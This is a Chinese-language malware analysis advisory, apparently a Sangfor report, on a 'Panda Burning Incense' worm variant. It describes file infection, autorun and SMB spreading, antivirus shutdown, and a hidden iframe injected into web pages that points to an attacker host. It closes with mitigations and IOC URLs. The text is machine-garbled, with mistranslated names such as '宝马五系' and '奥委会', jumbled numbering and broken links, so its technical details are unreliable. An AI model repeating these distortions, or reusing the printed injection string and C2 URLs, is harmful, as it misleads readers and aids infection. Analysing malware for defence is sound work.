一、病毒概述近日,深信服安全团队收到客户反馈,其内网多台主机中的文件感染了病毒,影响正常业务。经分析,该病毒为“熊猫烧香”病毒变种,虽然该病毒已有十余年历史,但由于其具有很强的感染及传播性,依然很容易…
一,病毒感染简述 近期,令人信服的安全性精英团队接到了顾客意见反馈,內部在网上好几个服务器中的文档感柒了病毒感染,危害了一切正常业务流程。历经剖析,该病毒感染是“熊猫烧香”病毒感染的这种变种。虽然该病毒感染早已存有了十几年,但因为其明显的感柒和散播,它依然非常容易在欠缺维护的内连接网络中散播。 该病毒性感染服务器中的可执行文件,压缩文件和web文档,而且可以根据硬盘和LAN散播,并具备抵抗软杀掉的个人行为。 在最开始的“Panda Burning Incense”病毒感染中毒了后被感柒的可执行文件将变成“Panda Burning Incense”的标志,这都是病毒名称的来源于。捕捉的变体在感柒后不容易更改图标,由于它会在可执行文件被感柒时获取初始文档的标志并将其插进受感柒的文档中。
该病毒感染的关键个人行为给出:
二,深入分析
2.2 嵌入一部分 病毒感染运作后,它将最先将本身拷贝到%SystemRoot%\ System32 \ drivers \ suchost.exe。
运作soost.exe随后撤出。
3.2 散播一部分 [1] 硬盘散播 Suchost.exe将本身拷贝到每一硬盘的主目录,名叫“.exe”,并在每一主目录下建立1个“autorun.inf”文档。文件属性是“只读”,“掩藏”,“系统软件”。
autorun.inf文档具备以下几点。该作用是在开启硬盘后自启动病毒感染物体“.exe”。那样,病毒感染就可以根据移动u盘或百度云盘传送。微软公司在2013年公布的补丁包KB967940中公布了自启动作用。它只适用Cd/游戏软件新闻媒体,因而修复后的系统软件或win7不容易以这类方法被感柒。
在硬盘的主目录中运作“.exe”将开启与硬盘相匹配的文件目录并关掉“我的电脑”对话框。事件实行全过程始终不变。
[2] 文档感柒 清除受感柒的系统目录包含: WINDOWS,WINNT,system32,文本文档和设定,系统软件卷信息内容,再造,Windows Nt,Windows Update,Windows Media Player,Outlook Express,Internet Explorer,NetMeeting,公共性文档,ComPlus手机应用程序,Messenger,InstallShield安裝信息内容,MSN,Microsoft Frontpage ,电影制作人,MSN Gamin Zone。 每一次感柒文件夹名称时,都是在其文件目录中建立Desktop_.ini纪录以纪录感柒时间。病毒感染会将当今时间与到时候感柒前的纪录时间开展较为,假如同样,则不容易反复感柒。 08.jpg 当病毒程序运作时,它将明确Desktop_.ini文档是不是存有于其文件目录中,假如存有则将其删掉。
清除受感柒的NTDETECT.Com文档,随后按文件后缀名称确定感柒总体目标。受感柒的文件类型关键分成几类:压缩文件,可执行文件和web文档:RAR,ZIP,EXE,SCR,PIF,Com,.asp,Html,asp,Python,jsp,aspx:
在感柒文档以前获得文件大小。假如超出某一值,则不容易被感柒。压缩文件为30M,可执行文件和网页文件为12M。 4.jpg 针对RAR和ZIP尾缀的压缩文件,将实行winrar指令将其解压缩到C: \ MyRARwork文件夹名称,随后该文档将被感柒,随后缩小回初始文件目录。 针对EXE,SCR,PIF和Com尾缀的可执行文件,最先明确他们是不是包括字符串“BMW !!”,假如是,则不必实行感柒。
获取初始文档的标志并将其临时储存到%Temp%文件目录。
拷贝病毒感染文档以遮盖受感柒的文档。
图标文件将载入病毒感染文档,便于受感柒的文件图标不容易变更,随后删掉图标文件。
随后将受感柒的初始文档加上到病毒感染文档中,并在最终载入标示。
感柒后可执行文件的构造是:病毒感染文档(替换成标志)+初始文档+0x00 +“宝马五系!!” +初始文件夹名称+“。exe”+0x02 +初始文件大小+0x01。 受感柒的可执行文件的尾端给出:
运作受感柒的文档将释放出来初始文档并将其取名为“初始文件夹名称+ .exe”。
在Temp文件目录中建立1个bat脚本制作并运作它。在Temp文件目录中建立1个bat脚本制作并运作它。 bat脚本制作用以删掉受感柒的文档,并将公布的“初始文件夹名称+ .exe”重新命名为初始文件夹名称。內容给出:
针对感柒.asp,html语言,asp,Python,jsp,aspx尾缀的web文档,故意连接为“< iframe src='hxxp: //WWW.5z9t.Com/htmmm/毫米..asp'width=0 height=0></iframe>“\”被破译并插进文档的结尾。
[3] 内网传送 139和445端口号崩裂和外扩散:
2.2 故意个人行为一部分 终止或卸载掉杀毒软件:
浏览下列网页页面以获得恶意程序下载地址,免费下载恶意程序并运作:
加上起动自启动项并停用隐藏文件的显示信息:
关掉共享网络:
将默认浏览器设定为ie浏览器,随后应用当地Mac作为主要参数浏览连接“hxxp: //WWW.daohang08.Com/down/tj/Mac.asp?Mac=”以获得统计分析中毒了服务器信息内容。
第二,解决方法 病毒检测和杀毒 1,深信为众多客户出示免費杀毒专用工具,可以免费下载下列专用工具开展检测和杀毒。
32位系统软件下载地址: .com://edr.sangfor.Com.Cn/tool/SfabAntiBot_X64.2z 31位系统软件下载地址: .com://edr.sangfor.Com.Cn/tool/SfabAntiBot_X86.2z 2.深信EDR商品,下一代防火墙和安全性认知服务平台及其别的网络安全产品都配置了病毒检测作用。布署有关商品的客户可以实行病毒检测,如下图所示:
病毒感染防御力 1.立即修复电子计算机以修复漏洞。
2.每季度实行关键数据文件的非当地备份文件。
3.切勿点击来源于不明来源于的电子邮箱附注,也不必从不明网址下载应用。
11.试着关掉多余的文件共享管理权限。 4.变更账号登陆密码,设定强登陆密码,并防止应用一致登陆密码,由于一致登陆密码会造成密码泄露,好几个登陆密码遭到损害。
6.假如服务项目不用RDP,提议关掉RDP。当产生该类恶性事件时,提议应用深度1令人信服的服务器防火墙,或终端设备防护没有响应服务平台(EDR)微防护作用来阻拦3389等端口号以避免外扩散!
11.深信服务器防火墙和终端设备检验与没有响应服务平台(EDR)具备防爆型作用。服务器防火墙开启此作用并开启11080051,11080027,11080016标准和EDR开启防爆型作用来防御力。
8,说动服务器防火墙的顾客,提议升級到AF805版本号,并开启人工智能技术模块Save以提高防御力实际效果。
10应用深度1令人信服的网络安全产品浏览安全性的云人的大脑,并应用云查验服务项目即时检验新的威协。 最终,提议公司对全部互联网开展安全大检查和反病毒扫描仪,以提升维护。提议应用Deep Confidence Security Awareness + Firewall + EDR来检验,停止和维护內部互联网。 第三,奥委会 MD5: AE8E8289B688497A672FE90D8A0AAE3F 网站地址: Hxxp: //WWW.5z9t.Com/htmmm/毫米..asp Hxxp: //WWW.5z9t.Com/down1.txt Hxxp: //WWW.daohang08.Com/down/houmendown.txt Hxxp: //WWW.daohang08.Com/down/tj/Mac.asp?Mac=